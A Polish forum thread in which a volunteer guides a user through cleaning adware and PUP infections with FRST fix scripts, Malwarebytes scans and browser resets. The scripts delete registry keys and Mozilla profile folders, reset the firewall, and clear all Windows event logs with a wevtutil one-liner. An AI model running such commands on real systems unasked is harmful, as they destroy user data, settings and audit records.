\??\C:\Program Files (x86)\Malware Hunter Suite\esgiguard.sys [X] DeleteKey: HKLM\SOFTWARE\Google\Chrome\Extensions DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Gr\AppData\Local\Mozilla C:\Users\Gr\AppData\Roaming\Mozilla C:\Users\Gr\AppData\Roaming\Profiles Folder: C:\WINDOWS\SysWOW64\3082 Folder: C:\WINDOWS\system32\1028 Hosts: CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Nie siedzę tutaj 24h / 7. Problem z Internetem wydaje się być nie dorzeczny. Zresetuje katalog Winsock - ale to naciągana naprawa łańcucha połączeń. C:\Windows\explorer.exe => Nie można zamknąć procesu "C:\Windows\System32\Drivers\etc\hosts" => Nie można przenieść Nie można przywrócić Hosts. Ty po prostu nie uruchamiasz FRST jako administrator, więc powtórz pkt. 1 (jako administrator), ale z następującym skryptem: Hosts: CMD: netsh winsock reset Dostarcz plik Fixlog i napisz czy problem z internetem i problem ze złośliwym oprogramowaniem ustąpiły.

Przepraszam, ale zapomniałem wcześniej powiedzieć: korzystasz z bardzo starej wersji FRST - pobierz najnowszą i jeszcze raz wykonaj raporty.

Wszystko pomyślnie wykonane, Malwarebytes wykrył tylko malutkie szczątki po PUP - usuwam je w skrypcie. Musimy jednak tylko powtórzyć reset pliku Hosts, który stawia opory - zrobimy to przy zabitej powłoce explorer. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe CreateRestorePoint: HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = SearchScopes: HKU\S-1-5-21-3590818742-3342905787-1238264347-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = HKU\S-1-5-21-3590818742-3342905787-1238264347-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://mail.ru/cnt/10445?gp=811141 C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\BOOKING.COM.LNK DeleteKey: HKU\S-1-5-21-3590818742-3342905787-1238264347-1001\SOFTWARE\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Powiedz jak podsumowujesz aktualny stan systemu. Czy wszystkie problemy ustąpiły?

Brakuje trzeciego obowiązkowego pliku FRST Shortcut - uzupełnij proszę.

Teoretyczne złe leczenie systemu może go uszkodzić, ale nie aż tak (tutaj po prostu żadne pliki Microsoft są niepodpisane cyfrowo, czyli tak jakby nieoryginalne). Kradzież raczej awykonalna. Poproszę picasso żeby rzuciła na to okiem. Zależy co i jak robiłeś, taki opis jest bardzo ogólny i ja nie wróże z fus. Nie rozumiem. Poproszę o screen tej akcji. 1. Zagrożenia wykryte przez Malwarebytes daj do kasacji - to resztki po PUP. 2. Poproszę o przefiltrowany raport z opcji sfc /scannow.

W systemie widocznych jest wiele infekcji. Głównie ulokowanych w Harmonogramie Zadań, widać również polecenie uruchamiające co start systemu reklamowe strony w przeglądarce Mozilla FireFox. Powinniśmy się z tym szybko uporać. P.S: Na koniec dezynfekcji odinstaluj jednego z antywirusów - powinien być jeden - inaczej może dojść do konfliktów. Na czas pomocy oba antywirusy wyłącz (mogą dublować moje działania). 1. Przez Panel Sterownia odinstaluj program podpisany przez podejrzanego wydawce: App Explorer. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Task: {34A877EA-6BAA-40DA-81F5-4472E0A19249} - System32\Tasks\100newsupnetsoxkziwx => "C:\Program Files\Mozilla Firefox\firefox.exe" 100newsup.net/soxkziwx Task: {17E59FF8-4D54-4B5F-B0F0-470251DD6537} - System32\Tasks\nlmagdghbp => C:\Users\Remek\AppData\Local\ioxoklkyagn.bat [2017-11-12] () Task: {788D3C90-1EC7-446A-A34C-ED7FA6BF3906} - System32\Tasks\lptgjvvoitf => C:\Users\Remek\AppData\Local\bwhdiugx.bat [2017-11-12] () Task: {A39DE2C0-CD1B-4377-BA44-0B02F0706E14} - System32\Tasks\pvcloeel => C:\Users\Remek\AppData\Local\wlzmz.bat [2017-11-12] () Task: {EF5EDF67-D89C-486B-89DA-9C942383BE0E} - System32\Tasks\pswggvzcao => C:\Users\Remek\AppData\Local\mzqrygwxty.bat [2017-11-12] () C:\Users\Remek\AppData\Local\ioxoklkyagn.bat C:\Users\Remek\AppData\Local\bwhdiugx.bat C:\Users\Remek\AppData\Local\wlzmz.bat C:\Users\Remek\AppData\Local\mzqrygwxty.bat C:\Users\Remek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk HKU\S-1-5-21-3590818742-3342905787-1238264347-1001\...\StartupApproved\Run: => "mailruhomesearch" GroupPolicy: Ograniczenia GroupPolicy\User: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = SearchScopes: HKU\S-1-5-21-3590818742-3342905787-1238264347-1001 -> {765E211B-5047-400B-A8E6-79CC8DF729E6} URL = HKU\S-1-5-21-3590818742-3342905787-1238264347-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://mail.ru/cnt/10445?gp=811141 SearchScopes: HKU\S-1-5-21-3590818742-3342905787-1238264347-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B182A5CC5-62AD-43BC-8F04-2F5D5FDFD668%7D&gp=811142 SearchScopes: HKU\S-1-5-21-3590818742-3342905787-1238264347-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B182A5CC5-62AD-43BC-8F04-2F5D5FDFD668%7D&gp=811142 S4 mccspsvc; "C:\Program Files\Common Files\McAfee\CSP\2.5.312.0\\McCSPServiceHost.exe" [X] 2017-11-12 22:50 - 2017-11-12 22:50 - 000000348 _____ () C:\Users\Remek\AppData\Local\gorknnnamdlo.bat 2017-11-12 22:52 - 2017-11-12 22:52 - 000000348 _____ () C:\Users\Remek\AppData\Local\jgqejkmxam.bat 2017-11-12 22:52 - 2017-11-12 22:52 - 000000348 _____ () C:\Users\Remek\AppData\Local\jvvwd.bat 2017-11-12 22:50 - 2017-11-12 22:50 - 000000348 _____ () C:\Users\Remek\AppData\Local\plcevar.bat C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\GPL License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\FairPlay License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\AFPL License.lnk C:\Users\Remek\Favorites\Mail.Ru Агент - используй для общения!.url C:\Users\Remek\Favorites\Mail.Ru.url Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przeglądarkę Mozilla FireFox (na używanych przez Ciebie profilach): Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. 4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Posługujesz się bardzo starą wersję FRST - pobierz najnowszą i zrób nowy zestaw raportów.

To wygląda na błąd ze strony MBAM - poczekaj na aktualizacje. Czyli większość problemów rozwiązanych - nad problemem z paskiem zadań i kartami w przeglądarce muszę pomyśleć.